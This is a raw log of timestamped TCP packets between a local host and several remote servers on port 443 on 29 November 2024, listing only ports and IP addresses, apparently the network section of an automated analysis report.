Nov 29, 2024 12:28:01.270329952 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:01.270395041 CET	49787	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:01.270606041 CET	49788	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:01.270633936 CET	443	49788	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:01.270701885 CET	49788	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:01.270895004 CET	49787	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:01.270910025 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:01.271127939 CET	49788	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:01.271142006 CET	443	49788	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:01.334269047 CET	49789	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.334290028 CET	443	49789	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.334466934 CET	49789	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.334712029 CET	49790	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.334758043 CET	443	49790	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.334871054 CET	49789	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.334882021 CET	443	49789	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.334888935 CET	49790	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.335083008 CET	49790	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.335094929 CET	443	49790	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.404166937 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:28:01.404437065 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:28:01.404474020 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:28:01.405502081 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:28:01.405559063 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:28:01.406773090 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:28:01.406836033 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:28:01.409797907 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:01.409821987 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:01.409856081 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:01.409895897 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:01.409903049 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:01.409931898 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:01.409969091 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:01.410504103 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:01.410504103 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:01.410527945 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:01.410537004 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:01.455284119 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:28:01.455292940 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:28:01.500627995 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:01.500659943 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:01.501095057 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:28:01.501307011 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:01.505033016 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:01.505047083 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:01.711571932 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.711599112 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.711745977 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.712022066 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.712038994 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.949234009 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.949554920 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.949572086 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.949896097 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.950309992 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.950371981 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.950400114 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.995335102 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.002626896 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.402080059 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.402152061 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.402323008 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.402323008 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.408176899 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:02.408205986 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:02.408215046 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:02.408231974 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:02.408301115 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:02.408476114 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:02.408476114 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:02.408499002 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:02.408626080 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:02.408638954 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:02.526746035 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.527077913 CET	49787	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.527107954 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.528175116 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.528228045 CET	49787	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.528565884 CET	49787	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.528634071 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.572859049 CET	443	49788	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.573074102 CET	49788	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.573107004 CET	443	49788	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.573429108 CET	443	49788	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.573800087 CET	49788	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.573853970 CET	443	49788	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.592135906 CET	443	49790	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.592458963 CET	49790	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.592483997 CET	443	49790	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.592827082 CET	443	49790	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.593514919 CET	49790	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.593583107 CET	443	49790	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.639627934 CET	443	49789	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.640002012 CET	49789	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.640012026 CET	443	49789	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.640340090 CET	443	49789	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.640633106 CET	49789	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.640686989 CET	443	49789	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.646564007 CET	49790	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.694401026 CET	49789	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.709214926 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.709249973 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.725285053 CET	49787	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.725302935 CET	49788	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.725315094 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.810194016 CET	49787	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.866189957 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:02.866262913 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:02.866280079 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:02.866308928 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:02.967127085 CET	49795	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:02.967185020 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:02.967257023 CET	49795	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:02.967586040 CET	49795	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:02.967601061 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:02.980139017 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:02.980173111 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.178462029 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.178663015 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.200016022 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.200026989 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.231501102 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.231518984 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.231601954 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.231616974 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.231620073 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.231640100 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.231802940 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.231822014 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232053041 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232074976 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232116938 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232125044 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232285023 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232316971 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232330084 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232336998 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232433081 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232450962 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232469082 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232479095 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232492924 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232506037 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232511044 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232515097 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232547045 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232554913 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232562065 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232570887 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232577085 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232584953 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232609034 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232620955 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232672930 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232692003 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.232693911 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.232697964 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.336539030 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:03.336585999 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:03.336663008 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:03.337084055 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:03.337100029 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:03.401789904 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:03.402477980 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:03.402504921 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:03.403278112 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:03.403283119 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:03.403317928 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:03.403326988 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:03.900559902 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.900625944 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:03.900751114 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.900969028 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:03.900984049 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:04.135406971 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:04.135431051 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:04.135479927 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:04.135497093 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:04.135519028 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:04.135554075 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:04.136104107 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:04.136118889 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:04.136162996 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:04.136286974 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:04.136321068 CET	443	49791	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:04.136374950 CET	49791	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:04.193253040 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.193573952 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.193589926 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.194701910 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.194762945 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.195787907 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.195863962 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.196135998 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.196144104 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.240310907 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.253137112 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.253464937 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.253483057 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.254555941 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.254631042 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.254961014 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.255022049 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.255126953 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.255136013 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:04.300123930 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:04.329242945 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.329518080 CET	49795	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.329556942 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.329932928 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.332317114 CET	49795	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.332391977 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.332596064 CET	49795	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.332616091 CET	49795	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.332631111 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.781040907 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.781311989 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.781335115 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.781718016 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.784248114 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.784367085 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.784394026 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.784409046 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.784419060 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.825053930 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.904566050 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.904665947 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:04.904757023 CET	49795	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.916898012 CET	49795	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:04.916932106 CET	443	49795	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.265511990 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.265537024 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.265551090 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.265564919 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.265585899 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.265594959 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.265620947 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.265635014 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.265666008 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.265666008 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.323242903 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.323321104 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.324515104 CET	49800	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.324548960 CET	443	49800	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:05.324762106 CET	49800	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.325050116 CET	49800	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.325058937 CET	443	49800	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:05.326647997 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.326653004 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.346937895 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.346959114 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.346970081 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.346982956 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.347008944 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.347023010 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.347035885 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.347055912 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.347074032 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.363593102 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.363601923 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.363657951 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.363666058 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.363671064 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.363673925 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.364124060 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.364135981 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.364371061 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.364388943 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.364394903 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.364404917 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.364794016 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.364809990 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.364815950 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.364835978 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.364969969 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.364981890 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.364988089 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.364999056 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365003109 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365012884 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365021944 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365026951 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365106106 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365117073 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365137100 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365148067 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365158081 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365164042 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365179062 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365185976 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365343094 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365350962 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365413904 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365420103 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365509987 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365516901 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365535975 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365545988 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365556955 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365562916 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365576982 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365582943 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365601063 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365607023 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.365612030 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.365613937 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.450229883 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.450256109 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.450263977 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.450273037 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.450290918 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.450328112 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.450344086 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.450366020 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.450398922 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.463757992 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.463778019 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.463938951 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.463951111 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.464061975 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.507493019 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.507567883 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.507571936 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.507617950 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.508894920 CET	49792	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.508913994 CET	443	49792	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.509162903 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.509181976 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.509257078 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.509270906 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.509284019 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.509310961 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.535676003 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.535697937 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.535765886 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.535790920 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.535835028 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.580904007 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.580938101 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.580980062 CET	49793	443	192.168.2.8	13.107.246.63
